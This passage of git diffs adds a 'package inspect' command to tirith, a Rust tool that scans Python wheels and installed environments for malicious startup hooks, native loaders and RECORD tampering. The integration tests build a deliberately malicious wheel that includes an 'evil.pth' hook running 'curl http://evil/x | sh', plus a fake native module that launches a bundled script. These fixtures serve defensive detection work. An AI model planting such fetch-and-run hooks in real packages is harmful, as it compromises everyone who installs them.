 maintainer = "Shivom Sharma <shivomsharma03@gmail.com>"

--- a/crates/tirith/src/cli/ecosystem.rs
+++ b/crates/tirith/src/cli/ecosystem.rs
@@ -315,6 +315,13 @@ fn print_human(report: &EcosystemScanReport) {
         }
     }
 
+    // B8e: surface the B5 installed-distribution integrity report (present only in
+    // `--installed` mode) so a human sees the per-distribution coverage and the
+    // cross-distribution ownership signals behind any integrity finding.
+    if let Some(integrity) = &report.integrity {
+        print_integrity_summary(integrity);
+    }
+
     // Findings go to stdout so they can be captured / piped.
     if finding_count == 0 {
         eprintln!();
@@ -366,6 +373,56 @@ fn print_human(report: &EcosystemScanReport) {
                  provenance signals)"
             );
         }
+    }
+}
+
+/// Print the B5 installed-distribution integrity summary to stderr (so it never
+/// corrupts `--format json` stdout). Surfaces the per-distribution coverage and the
+/// cross-distribution ownership signals; the correlated integrity FINDINGS already
+/// print with the other findings (they are folded into the verdict). A clean
+/// installed scan prints a one-line "no integrity issues" confirmation.
+fn print_integrity_summary(integrity: &tirith_core::ecosystem_scan::InstalledIntegrityReport) {
+    eprintln!();
+    eprintln!(
+        "  installed integrity: {} distribution(s) checked across {} site-packages root(s)",
+        integrity.distributions_checked,
+        integrity.site_packages_roots.len(),
+    );
+    if integrity.records_missing > 0 {
+        eprintln!(
+            "    - {} distribution(s) had no RECORD (a coverage gap, not a violation)",
+            integrity.records_missing
+        );
+    }
+    if integrity.hash_mismatches > 0 {
+        eprintln!(
+            "    - {} RECORD hash mismatch(es) against on-disk bytes",
+            integrity.hash_mismatches
+        );
+    }
+    for dup in &integrity.duplicate_owned_paths {
+        eprintln!(
+            "    - path '{}' owned by multiple distributions: {}",
+            dup.path,
+            dup.owners.join(", ")
+        );
+    }
+    for hook in &integrity.unowned_startup_hooks {
+        eprintln!("    - unowned startup hook: {hook}");
+    }
+    if integrity.native_modules_triaged > 0 {
+        eprintln!(
+            "    - {} native module(s) triaged",
+            integrity.native_modules_triaged
+        );
+    }
+    let clean = integrity.hash_mismatches == 0
+        && integrity.duplicate_owned_paths.is_empty()
+        && integrity.unowned_startup_hooks.is_empty()
+        && integrity.startup_signals.is_empty()
+        && integrity.native_findings.is_empty();
+    if clean {
+        eprintln!("    - no integrity issues detected");
     }
 }
 

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -250,6 +250,13 @@ fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
         tirith_core::verdict::Timings::default(),
     );
 
+    // The verdict's own exit code, computed up front so a write failure can preserve it.
+    let code = match verdict.action {
+        Action::Block => 1,
+        Action::Warn | Action::WarnAck => 2,
+        Action::Allow => 0,
+    };
+
     let output_ok = if json {
         print_inspect_json(&set, &verdict)
     } else {
@@ -257,14 +264,13 @@ fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
         true
     };
 
+    // A write failure must not DOWNGRADE a Warn (2) into a block-grade 1, nor pass a
+    // clean scan off as success: surface the verdict's own non-zero code, or 1 when the
+    // scan was clean (mirrors the ecosystem.rs write-failure path).
     if !output_ok {
-        return 1;
+        return if code == 0 { 1 } else { code };
     }
-    match verdict.action {
-        Action::Block => 1,
-        Action::Warn | Action::WarnAck => 2,
-        Action::Allow => 0,
-    }
+    code
 }
 
 /// JSON output for `package inspect`: the verdict (with member-qualified finding

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -285,8 +285,12 @@ fn print_inspect_json(
         schema_version: u32,
         action: String,
         artifacts: Vec<JsonArtifact<'a>>,
-        cross_distribution_findings: &'a [tirith_core::verdict::Finding],
         coverage_gaps: Vec<JsonGap>,
+        // The single authoritative finding list (post `action_overrides` escalation), via
+        // `set.all_findings` which already appends the cross-distribution findings. A
+        // separate raw `cross_distribution_findings` field was removed: it duplicated each
+        // cross finding here with its PRE-escalation severity, so a consumer saw the same
+        // finding twice with conflicting severities and no authoritative one.
         findings: &'a [tirith_core::verdict::Finding],
     }
     #[derive(serde::Serialize)]
@@ -318,7 +322,6 @@ fn print_inspect_json(
         schema_version: 1,
         action: format!("{:?}", verdict.action).to_lowercase(),
         artifacts,
-        cross_distribution_findings: &set.cross_findings,
         coverage_gaps: set
             .gaps
             .iter()

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -251,12 +251,30 @@ fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
     );
 
     // A structurally REJECTED artifact (path traversal, duplicate-path collision, an
-    // encrypted member) is a hard archive violation that `all_findings` (B5/B6/B7 signal
-    // correlation) does NOT see. It must NOT pass as `allow` / exit 0, or a CI consumer
-    // keying off the exit code or the JSON `action` would pass a path-traversal wheel that
-    // the human output already flags `[REJECTED]`. Force Block.
-    if set.members.iter().any(|m| m.inspected.rejected) {
+    // encrypted member, a CRC mismatch) is a hard archive violation that `all_findings`
+    // (B5/B6/B7 signal correlation) does NOT see. Force Block AND synthesize a
+    // WheelStructurallyRejected finding (carrying the violation details) for each rejected
+    // member, so `findings` is non-empty whenever the action is Block due to a rejection:
+    // a CI consumer gating on `findings.length` (not only the action, exit code, or the
+    // nested `rejected`/`violations` fields) must not pass a path-traversal wheel.
+    for m in set.members.iter().filter(|m| m.inspected.rejected) {
         verdict.action = Action::Block;
+        let detail = if m.inspected.violation_details.is_empty() {
+            "structural archive violation".to_string()
+        } else {
+            m.inspected.violation_details.join("; ")
+        };
+        verdict.findings.push(tirith_core::verdict::Finding {
+            rule_id: tirith_core::verdict::RuleId::WheelStructurallyRejected,
+            severity: tirith_core::verdict::Severity::High,
+            title: "Wheel structurally rejected".to_string(),
+            description: format!("{}: {}", m.path.display(), detail),
+            evidence: Vec::new(),
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        });
     }
 
     // The verdict's own exit code, computed up front so a write failure can preserve it.

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -191,7 +191,12 @@ fn collect_set_wheels(dir: &Path) -> Result<Vec<PathBuf>, i32> {
         .filter_map(Result::ok)
         .map(|e| e.path())
         .filter(|p| {
+            // `is_file()` FOLLOWS symlinks: a symlinked `.whl` would pass here, then the
+            // no-follow reader rejects it downstream into `gaps`, leaving `members` empty and
+            // the command exiting 0 (Allow). Require a REAL regular file so an all-symlink set
+            // directory correctly exits 2 ("no .whl files found").
             p.is_file()
+                && !p.is_symlink()
                 && p.extension()
                     .and_then(|e| e.to_str())
                     .is_some_and(|e| e.eq_ignore_ascii_case("whl"))
@@ -221,6 +226,16 @@ fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
         if !p.exists() {
             eprintln!(
                 "tirith package inspect: artifact not found: {}",
+                p.display()
+            );
+            return 2;
+        }
+        // A path that EXISTS but is not a REGULAR file (a symlink, directory, fifo, ...) would
+        // be rejected by the no-follow reader downstream into `gaps`, leaving `members` empty
+        // and the command exiting 0 (Allow) as if clean. Treat it as a usage error (exit 2).
+        if !p.is_file() || p.is_symlink() {
+            eprintln!(
+                "tirith package inspect: artifact is not a regular file: {}",
                 p.display()
             );
             return 2;
@@ -1017,6 +1032,29 @@ mod tests {
             risk("not-a-real-ecosystem", "react", None, false, false, false),
             2
         );
+    }
+
+    #[test]
+    #[cfg(unix)]
+    fn collect_set_wheels_excludes_symlinks() {
+        // A symlinked `.whl` must NOT count as a set member: is_file() follows the link, but the
+        // no-follow reader rejects it downstream into a gap, leaving members empty and the
+        // command exiting 0 (Allow). An all-symlink set directory must exit 2, and a symlink
+        // must not be mistaken for a member when a real wheel is also present.
+        use std::os::unix::fs::symlink;
+        let dir = tempdir().unwrap();
+        let target = dir.path().join("real-1.0-py3-none-any.whl");
+        fs::write(&target, b"PK\x03\x04").unwrap();
+        let set_dir = dir.path().join("set");
+        fs::create_dir(&set_dir).unwrap();
+        symlink(&target, set_dir.join("linked-1.0-py3-none-any.whl")).unwrap();
+        // Only a symlinked .whl -> no real members -> Err(2).
+        assert_eq!(collect_set_wheels(&set_dir), Err(2));
+        // A REAL .whl alongside the symlink is collected; the symlink is excluded, not the dir.
+        fs::write(set_dir.join("real2-1.0-py3-none-any.whl"), b"PK\x03\x04").unwrap();
+        let got = collect_set_wheels(&set_dir).expect("a real wheel is present");
+        assert_eq!(got.len(), 1, "symlink excluded, real wheel kept: {got:?}");
+        assert!(got[0].ends_with("real2-1.0-py3-none-any.whl"));
     }
 
     #[test]

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -243,12 +243,21 @@ fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
     let policy = tirith_core::policy::Policy::discover(policy_root.as_deref());
 
     let findings = set.all_findings(db.as_deref());
-    let verdict = tirith_core::escalation::finalize_static_verdict(
+    let mut verdict = tirith_core::escalation::finalize_static_verdict(
         findings,
         &policy,
         3,
         tirith_core::verdict::Timings::default(),
     );
+
+    // A structurally REJECTED artifact (path traversal, duplicate-path collision, an
+    // encrypted member) is a hard archive violation that `all_findings` (B5/B6/B7 signal
+    // correlation) does NOT see. It must NOT pass as `allow` / exit 0, or a CI consumer
+    // keying off the exit code or the JSON `action` would pass a path-traversal wheel that
+    // the human output already flags `[REJECTED]`. Force Block.
+    if set.members.iter().any(|m| m.inspected.rejected) {
+        verdict.action = Action::Block;
+    }
 
     // The verdict's own exit code, computed up front so a write failure can preserve it.
     let code = match verdict.action {

--- a/crates/tirith/src/cli/package.rs
+++ b/crates/tirith/src/cli/package.rs
@@ -90,6 +90,293 @@ pub fn scan(
     )
 }
 
+/// Run `tirith package inspect` — the VERDICT-oriented artifact / installed
+/// inspector (B8b). Unlike `risk`/`explain` (advisory scorers that always exit 0),
+/// this exits scan-style: 0 clean, 1 a block-grade finding, 2 an advisory (warn)
+/// finding, 2 on a usage error.
+///
+/// Modes (mutually exclusive at the CLI):
+/// * one or more `--artifact <file>` — inspect each wheel; with two or more, also
+///   correlate a cross-distribution loader/payload split across them (B8c);
+/// * `--artifact-set <dir>` — inspect every `.whl` in a directory as a set;
+/// * `--installed <dir>` — inspect an installed environment (routes through the
+///   `ecosystem scan --installed` engine, which already runs B5/B6/B7 and the
+///   multi-wheel cross-distribution correlation, B8e).
+pub fn inspect(
+    artifacts: &[PathBuf],
+    artifact_set: Option<&Path>,
+    installed: Option<&Path>,
+    json: bool,
+) -> i32 {
+    // Exactly one mode must be selected. clap marks `--artifact-set`/`--installed`
+    // mutually exclusive; guard the combinations clap cannot express.
+    let mode_count =
+        (!artifacts.is_empty()) as u8 + artifact_set.is_some() as u8 + installed.is_some() as u8;
+    if mode_count == 0 {
+        eprintln!(
+            "tirith package inspect: nothing to inspect. Pass --artifact <file> \
+             (repeatable), --artifact-set <dir>, or --installed <dir>."
+        );
+        return 2;
+    }
+    if mode_count > 1 {
+        eprintln!(
+            "tirith package inspect: choose ONE of --artifact, --artifact-set, or --installed."
+        );
+        return 2;
+    }
+
+    if let Some(venv) = installed {
+        return inspect_installed(venv, json);
+    }
+
+    // Resolve the artifact paths to inspect (explicit list, or every `.whl` in the
+    // set directory).
+    let paths: Vec<PathBuf> = if let Some(dir) = artifact_set {
+        match collect_set_wheels(dir) {
+            Ok(p) => p,
+            Err(code) => return code,
+        }
+    } else {
+        artifacts.to_vec()
+    };
+
+    inspect_artifacts(&paths, json)
+}
+
+/// Inspect an installed environment by routing through the `ecosystem scan
+/// --installed` engine (B8e: it already runs B5/B6/B7 and the cross-distribution
+/// ownership correlation, surfaces the `InstalledIntegrityReport`, and folds the
+/// findings into the verdict / exit code).
+fn inspect_installed(venv: &Path, json: bool) -> i32 {
+    let Some(path_str) = venv.to_str() else {
+        eprintln!(
+            "tirith package inspect: path {:?} is not valid UTF-8; tirith inspects UTF-8 paths only.",
+            venv.display()
+        );
+        return 2;
+    };
+    super::ecosystem::scan(
+        Some(path_str),
+        /* online = */ false,
+        /* offline = */ true,
+        /* installed = */ true,
+        /* max_installed_entries = */ 5000,
+        /* non_interactive = */ true,
+        json,
+    )
+}
+
+/// Collect every `.whl` in `dir` (non-recursive) for `--artifact-set`. Returns an
+/// exit code on a usage error (a missing/unreadable directory, or no wheels).
+fn collect_set_wheels(dir: &Path) -> Result<Vec<PathBuf>, i32> {
+    if !dir.is_dir() {
+        eprintln!(
+            "tirith package inspect: --artifact-set path is not a directory: {}",
+            dir.display()
+        );
+        return Err(2);
+    }
+    let rd = match std::fs::read_dir(dir) {
+        Ok(rd) => rd,
+        Err(e) => {
+            eprintln!(
+                "tirith package inspect: cannot read --artifact-set directory {}: {e}",
+                dir.display()
+            );
+            return Err(2);
+        }
+    };
+    let mut wheels: Vec<PathBuf> = rd
+        .filter_map(Result::ok)
+        .map(|e| e.path())
+        .filter(|p| {
+            p.is_file()
+                && p.extension()
+                    .and_then(|e| e.to_str())
+                    .is_some_and(|e| e.eq_ignore_ascii_case("whl"))
+        })
+        .collect();
+    wheels.sort();
+    if wheels.is_empty() {
+        eprintln!(
+            "tirith package inspect: no .whl files found in --artifact-set directory {}",
+            dir.display()
+        );
+        return Err(2);
+    }
+    Ok(wheels)
+}
+
+/// Inspect a list of artifact paths (a single wheel, or a set for
+/// cross-distribution correlation), print the verdict, and return a scan-style
+/// exit code.
+fn inspect_artifacts(paths: &[PathBuf], json: bool) -> i32 {
+    use tirith_core::artifact::inspect::inspect_artifact_set;
+    use tirith_core::verdict::Action;
+
+    // Validate each path exists up front so a typo is a usage error (exit 2), not a
+    // silent coverage gap.
+    for p in paths {
+        if !p.exists() {
+            eprintln!(
+                "tirith package inspect: artifact not found: {}",
+                p.display()
+            );
+            return 2;
+        }
+    }
+
+    // The set inspector handles BOTH a single artifact and a set: pass 1 inspects
+    // each independently, pass 2 correlates cross-distribution splits (a no-op for a
+    // single artifact). The threat DB is threaded for the (feature-gated)
+    // known-malicious hash check.
+    let db = ThreatDb::cached();
+    let set = inspect_artifact_set(paths);
+
+    // Discover the operator policy from the first artifact's directory so a strict
+    // integrity policy's overrides are honored on this verdict site too.
+    let policy_root = paths
+        .first()
+        .and_then(|p| p.parent())
+        .map(|p| p.display().to_string());
+    let policy = tirith_core::policy::Policy::discover(policy_root.as_deref());
+
+    let findings = set.all_findings(db.as_deref());
+    let verdict = tirith_core::escalation::finalize_static_verdict(
+        findings,
+        &policy,
+        3,
+        tirith_core::verdict::Timings::default(),
+    );
+
+    let output_ok = if json {
+        print_inspect_json(&set, &verdict)
+    } else {
+        print_inspect_human(&set, &verdict);
+        true
+    };
+
+    if !output_ok {
+        return 1;
+    }
+    match verdict.action {
+        Action::Block => 1,
+        Action::Warn | Action::WarnAck => 2,
+        Action::Allow => 0,
+    }
+}
+
+/// JSON output for `package inspect`: the verdict (with member-qualified finding
+/// locations carried in evidence) plus per-artifact coverage and the
+/// cross-distribution findings. Returns `false` on a write failure.
+fn print_inspect_json(
+    set: &tirith_core::artifact::inspect::ArtifactSetInspection,
+    verdict: &tirith_core::verdict::Verdict,
+) -> bool {
+    #[derive(serde::Serialize)]
+    struct JsonOut<'a> {
+        schema_version: u32,
+        action: String,
+        artifacts: Vec<JsonArtifact<'a>>,
+        cross_distribution_findings: &'a [tirith_core::verdict::Finding],
+        coverage_gaps: Vec<JsonGap>,
+        findings: &'a [tirith_core::verdict::Finding],
+    }
+    #[derive(serde::Serialize)]
+    struct JsonArtifact<'a> {
+        path: String,
+        rejected: bool,
+        #[serde(skip_serializing_if = "<[_]>::is_empty")]
+        violations: &'a [String],
+        inspection: &'a tirith_core::artifact::ArtifactInspection,
+    }
+    #[derive(serde::Serialize)]
+    struct JsonGap {
+        location: String,
+        kind: &'static str,
+    }
+
+    let artifacts: Vec<JsonArtifact> = set
+        .members
+        .iter()
+        .map(|m| JsonArtifact {
+            path: m.path.display().to_string(),
+            rejected: m.inspected.rejected,
+            violations: &m.inspected.violation_details,
+            inspection: &m.inspected.inspection,
+        })
+        .collect();
+
+    let out = JsonOut {
+        schema_version: 1,
+        action: format!("{:?}", verdict.action).to_lowercase(),
+        artifacts,
+        cross_distribution_findings: &set.cross_findings,
+        coverage_gaps: set
+            .gaps
+            .iter()
+            .map(|g| JsonGap {
+                location: g.location.to_string(),
+                kind: g.kind.as_str(),
+            })
+            .collect(),
+        findings: &verdict.findings,
+    };
+    super::write_json_stdout(&out, "tirith package inspect: failed to write JSON output")
+}
+
+/// Human output for `package inspect`: a per-artifact summary to stderr and the
+/// findings (member-qualified) to stdout, mirroring the `tirith scan` convention.
+fn print_inspect_human(
+    set: &tirith_core::artifact::inspect::ArtifactSetInspection,
+    verdict: &tirith_core::verdict::Verdict,
+) {
+    eprintln!(
+        "tirith package inspect: {} artifact(s) inspected",
+        set.members.len()
+    );
+    for m in &set.members {
+        let status = if m.inspected.rejected {
+            " [REJECTED: structural violation]"
+        } else {
+            ""
+        };
+        eprintln!("  {}{status}", m.path.display());
+        for v in &m.inspected.violation_details {
+            eprintln!("    - {v}");
+        }
+    }
+    for gap in &set.gaps {
+        eprintln!("  not inspected: {} ({})", gap.location, gap.kind.as_str());
+    }
+
+    if verdict.findings.is_empty() {
+        eprintln!();
+        eprintln!("  no artifact risks found.");
+        return;
+    }
+
+    println!();
+    println!("Artifact findings:");
+    for finding in &verdict.findings {
+        let sev = tirith_core::style::severity_label(
+            &finding.severity,
+            tirith_core::style::Stream::Stdout,
+        );
+        println!("  {} {} — {}", sev, finding.rule_id, finding.title);
+        // Surface the member-qualified location lines from the evidence so a
+        // reviewer sees `foo.whl!/member`, not just the outer wheel.
+        for ev in &finding.evidence {
+            if let tirith_core::verdict::Evidence::Text { detail } = ev {
+                if detail.starts_with("location:") || detail.contains("!/") {
+                    println!("    {detail}");
+                }
+            }
+        }
+    }
+}
+
 /// Run `tirith package risk <ecosystem> <name>`. Prints the deterministic risk
 /// score; `path` optionally points at local package content to inspect (else
 /// auto-discovered under `node_modules`/`site-packages`). `online` opts into

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -5785,6 +5785,44 @@ is assumed.")]
         #[arg(long, hide = true, conflicts_with = "format")]
         json: bool,
     },
+    /// Inspect exact package artifacts (wheels) or an installed environment for
+    /// startup hooks, native import chains, RECORD tampering, and
+    /// cross-distribution loader/payload splits
+    #[command(after_help = "\
+Examples:
+  tirith package inspect --artifact dist/foo-1.0-py3-none-any.whl
+  tirith package inspect --artifact a.whl --artifact b.whl
+  tirith package inspect --artifact-set ./downloaded-wheels/
+  tirith package inspect --installed ./.venv
+  tirith package inspect --format json --artifact dist/foo.whl
+
+Verdict-oriented (unlike `package risk`, which is an advisory scorer): exits
+0 when clean, 1 on a block-grade finding, 2 on an advisory (warn) finding.
+Pass two or more --artifact files (or --artifact-set <dir>) to detect a
+cross-distribution split where one wheel's startup hook executes a payload
+bundled in another. Member-qualified locations (foo.whl!/pkg/file) appear in
+--format json output. tirith never downloads an artifact; it inspects the
+bytes you point it at.")]
+    Inspect {
+        /// A wheel (.whl) artifact to inspect. Repeatable: pass two or more to
+        /// detect a cross-distribution loader/payload split across them.
+        #[arg(long, value_name = "FILE")]
+        artifact: Vec<PathBuf>,
+        /// A directory of wheels to inspect as a SET (cross-distribution
+        /// correlation across every .whl found, non-recursively).
+        #[arg(long, value_name = "DIR", conflicts_with = "installed")]
+        artifact_set: Option<PathBuf>,
+        /// An installed environment (a venv or site-packages root) to inspect for
+        /// RECORD integrity, startup hooks, and native import chains.
+        #[arg(long, value_name = "DIR", conflicts_with = "artifact_set")]
+        installed: Option<PathBuf>,
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
 }
 
 #[derive(Subcommand)]
@@ -7155,6 +7193,21 @@ fn run() {
                     offline,
                     max_installed_entries,
                     non_interactive,
+                    json,
+                )
+            }
+            PackageAction::Inspect {
+                artifact,
+                artifact_set,
+                installed,
+                format,
+                json,
+            } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::package::inspect(
+                    &artifact,
+                    artifact_set.as_deref(),
+                    installed.as_deref(),
                     json,
                 )
             }

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -15964,23 +15964,22 @@ fn package_inspect_cross_distribution_attaches_to_loader_names_payload() {
     );
     let json: serde_json::Value =
         serde_json::from_slice(&out.stdout).expect("inspect set --format json must be valid JSON");
-    let cross = json["cross_distribution_findings"]
-        .as_array()
-        .expect("cross_distribution_findings array");
+    // The cross-distribution finding now lives in the single authoritative `findings`
+    // list (no separate, pre-escalation `cross_distribution_findings` array). Exactly one
+    // finding names BOTH the loader and the payload artifact.
+    let findings = json["findings"].as_array().expect("findings array");
+    let cross: Vec<&serde_json::Value> = findings
+        .iter()
+        .filter(|f| {
+            let s = f.to_string();
+            s.contains("loaderpkg-1.0-py3-none-any.whl")
+                && s.contains("payloadpkg-2.0-py3-none-any.whl")
+        })
+        .collect();
     assert_eq!(
         cross.len(),
         1,
-        "exactly one cross-distribution finding expected; got: {json}"
-    );
-    // The finding names BOTH the loader and the payload artifact.
-    let cross_text = cross[0].to_string();
-    assert!(
-        cross_text.contains("loaderpkg-1.0-py3-none-any.whl"),
-        "the cross finding must name the loader artifact: {cross_text}"
-    );
-    assert!(
-        cross_text.contains("payloadpkg-2.0-py3-none-any.whl"),
-        "the cross finding must name the payload artifact: {cross_text}"
+        "exactly one cross-distribution finding (naming both artifacts) expected in findings; got: {json}"
     );
 }
 

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -4878,6 +4878,59 @@ fn ecosystem_scan_installed_and_package_scan_installed_produce_identical_json() 
     );
 }
 
+/// B8 regression: wiring artifact inspection into the product (the `package
+/// inspect` command and the human-side integrity summary) MUST NOT perturb the
+/// MANIFEST-mode `ecosystem scan` JSON. The manifest/lockfile modes never compute
+/// an `InstalledIntegrityReport`, so the JSON is unchanged; pin that `ecosystem
+/// scan` and `package scan` still agree byte-for-byte over a manifest directory.
+#[test]
+fn ecosystem_scan_manifest_mode_json_unaffected_by_b8() {
+    let proj = tempfile::tempdir().expect("project tempdir");
+    // A simple npm manifest (declared deps, NOT an installed tree).
+    fs::write(
+        proj.path().join("package.json"),
+        r#"{"name":"app","version":"1.0.0","dependencies":{"react":"18.2.0","left-pad":"1.3.0"}}"#,
+    )
+    .expect("write package.json");
+
+    let state_a = tempfile::tempdir().expect("state-a tempdir");
+    let state_b = tempfile::tempdir().expect("state-b tempdir");
+
+    let a = tirith_ecosystem(state_a.path())
+        .args([
+            "ecosystem",
+            "scan",
+            "--format",
+            "json",
+            proj.path().to_str().unwrap(),
+        ])
+        .output()
+        .expect("run ecosystem scan (manifests)");
+    let b = tirith_ecosystem(state_b.path())
+        .args([
+            "package",
+            "scan",
+            "--format",
+            "json",
+            "--path",
+            proj.path().to_str().unwrap(),
+        ])
+        .output()
+        .expect("run package scan (manifests)");
+
+    assert_eq!(
+        a.stdout, b.stdout,
+        "manifest-mode ecosystem scan / package scan JSON must stay byte-identical after B8"
+    );
+    // And the manifest-mode JSON carries NO `integrity` key (it is installed-only).
+    let json: serde_json::Value =
+        serde_json::from_slice(&a.stdout).expect("manifest-mode scan JSON must be valid");
+    assert!(
+        json.get("integrity").is_none(),
+        "manifest-mode JSON must not carry an integrity report: {json}"
+    );
+}
+
 #[test]
 fn package_scan_installed_and_lockfile_are_mutually_exclusive() {
     // clap's `conflicts_with` enforces this — the CLI must refuse the combination at parse time
@@ -15678,5 +15731,408 @@ fn scan_repo_policy_ignore_oversized_is_clamped_to_warn() {
     assert_eq!(
         json["analysis_incomplete"], true,
         "the clamped repo policy still surfaces the oversized gap; got: {json}"
+    );
+}
+
+// ---------------------------------------------------------------------------
+// B8: `package inspect` (artifact + artifact-set) and `scan` artifact dispatch
+// ---------------------------------------------------------------------------
+
+/// Build an in-memory wheel (a ZIP) from `(member, body)` pairs.
+fn build_wheel_bytes(members: &[(&str, &[u8])]) -> Vec<u8> {
+    use std::io::Write as _;
+    use zip::write::SimpleFileOptions;
+    use zip::ZipWriter;
+    let mut zw = ZipWriter::new(std::io::Cursor::new(Vec::new()));
+    for (name, body) in members {
+        zw.start_file(*name, SimpleFileOptions::default()).unwrap();
+        zw.write_all(body).unwrap();
+    }
+    zw.finish().unwrap().into_inner()
+}
+
+/// Write a wheel into `dir` under `name`, returning its path.
+fn write_wheel(dir: &std::path::Path, name: &str, members: &[(&str, &[u8])]) -> PathBuf {
+    let bytes = build_wheel_bytes(members);
+    let p = dir.join(name);
+    fs::write(&p, bytes).unwrap();
+    p
+}
+
+/// Build a minimal CLEAN wheel into `dir`: one source module + dist-info, no
+/// startup hook, and a STRICT-valid RECORD listing every member with its real
+/// SHA-256 (the wheel-RECORD verifier requires this, so an incomplete RECORD would
+/// itself be an integrity finding). Returns the wheel path.
+fn write_clean_wheel(dir: &std::path::Path, name: &str) -> PathBuf {
+    use base64::Engine as _;
+    use sha2::{Digest, Sha256};
+
+    let init = b"print('hi')\n".as_slice();
+    let metadata = b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice();
+    let wheel = b"Wheel-Version: 1.0\n".as_slice();
+
+    let record_line = |path: &str, body: &[u8]| -> String {
+        let digest = Sha256::digest(body);
+        let b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(digest);
+        format!("{path},sha256={b64},{}\n", body.len())
+    };
+    let mut record = String::new();
+    record.push_str(&record_line("demo/__init__.py", init));
+    record.push_str(&record_line("demo-1.0.dist-info/METADATA", metadata));
+    record.push_str(&record_line("demo-1.0.dist-info/WHEEL", wheel));
+    // RECORD itself is listed with empty hash/size.
+    record.push_str("demo-1.0.dist-info/RECORD,,\n");
+
+    let members: Vec<(&str, &[u8])> = vec![
+        ("demo/__init__.py", init),
+        ("demo-1.0.dist-info/METADATA", metadata),
+        ("demo-1.0.dist-info/WHEEL", wheel),
+        ("demo-1.0.dist-info/RECORD", record.as_bytes()),
+    ];
+    write_wheel(dir, name, &members)
+}
+
+#[test]
+fn package_inspect_clean_wheel_exits_0() {
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    let wheel = write_clean_wheel(proj, "demo-1.0-py3-none-any.whl");
+
+    let out = tirith_in_proj(proj)
+        .args(["package", "inspect", "--artifact"])
+        .arg(&wheel)
+        .output()
+        .expect("run package inspect");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "a clean wheel must inspect to exit 0; stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+}
+
+/// A native member (`.so`-named) crafted to trip the B7 import-execution chain
+/// from the string-scan path: an ELF magic prefix (so it classifies as a native
+/// module) plus a `PyInit_*` export string (the execution entry) and ONE string
+/// co-locating a spawn verb with a runtime (the campaign's launch pattern, which is
+/// both the danger capability and the corroboration), plus a sibling `.js` payload
+/// reference. Filename-independent: the bytes, not the name, drive the detection.
+fn bun_launching_native_member() -> Vec<u8> {
+    let mut bytes = Vec::new();
+    bytes.extend_from_slice(b"\x7fELF\x02\x01\x01\x00"); // ELF64 LE magic prefix
+    bytes.extend_from_slice(b"\x00".repeat(56).as_slice()); // pad the header region
+    bytes.extend_from_slice(b"PyInit__speedups\x00");
+    // A single string co-locating a spawn verb + runtime + sibling script.
+    bytes.extend_from_slice(b"posix_spawn bun ./_index.js\x00");
+    bytes.extend_from_slice(b"\x00".repeat(64).as_slice());
+    bytes
+}
+
+#[test]
+fn package_inspect_malicious_wheel_exits_1_with_member_location() {
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    // A wheel exercising all three analyzers at once:
+    //   B6 — an executable `.pth` that spawns a subprocess at startup;
+    //   B7 — a Bun-launching native member (import-execution chain);
+    //   B5 — a RECORD that lists a member with a WRONG hash (a tamper mismatch).
+    let init = b"print('hi')\n".as_slice();
+    let native = bun_launching_native_member();
+    // RECORD lists `demo/__init__.py` with a deliberately wrong sha256 (a mismatch),
+    // and does NOT list the `.so` or the `.pth` (unlisted members).
+    let wrong_record = b"demo/__init__.py,sha256=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,12\n\
+          demo-1.0.dist-info/RECORD,,\n"
+        .as_slice();
+    let members: Vec<(&str, &[u8])> = vec![
+        (
+            "evil.pth",
+            b"import os; os.system('curl http://evil/x | sh')\n".as_slice(),
+        ),
+        ("demo/__init__.py", init),
+        ("demo/_speedups.abi3.so", native.as_slice()),
+        (
+            "demo-1.0.dist-info/METADATA",
+            b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
+        ),
+        ("demo-1.0.dist-info/RECORD", wrong_record),
+    ];
+    let wheel = write_wheel(proj, "demo-1.0-py3-none-any.whl", &members);
+
+    // JSON path.
+    let out = tirith_in_proj(proj)
+        .args(["package", "inspect", "--format", "json", "--artifact"])
+        .arg(&wheel)
+        .output()
+        .expect("run package inspect");
+    assert_eq!(
+        out.status.code(),
+        Some(1),
+        "a malicious wheel (startup hook + native chain + RECORD mismatch) is block-grade \
+         (exit 1); stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("inspect --format json must be valid JSON");
+    let text = json.to_string();
+    // B6 startup finding fired.
+    assert!(
+        text.contains("python_startup_hook_suspicious"),
+        "the startup finding must be in the JSON: {text}"
+    );
+    // B7 native chain fired.
+    assert!(
+        text.contains("native_import_execution_chain"),
+        "the native import-execution chain must be in the JSON: {text}"
+    );
+    // B8f: a member-qualified `foo.whl!/member` location appears.
+    assert!(
+        text.contains("!/evil.pth"),
+        "a member-qualified location (foo.whl!/evil.pth) must appear in the JSON: {text}"
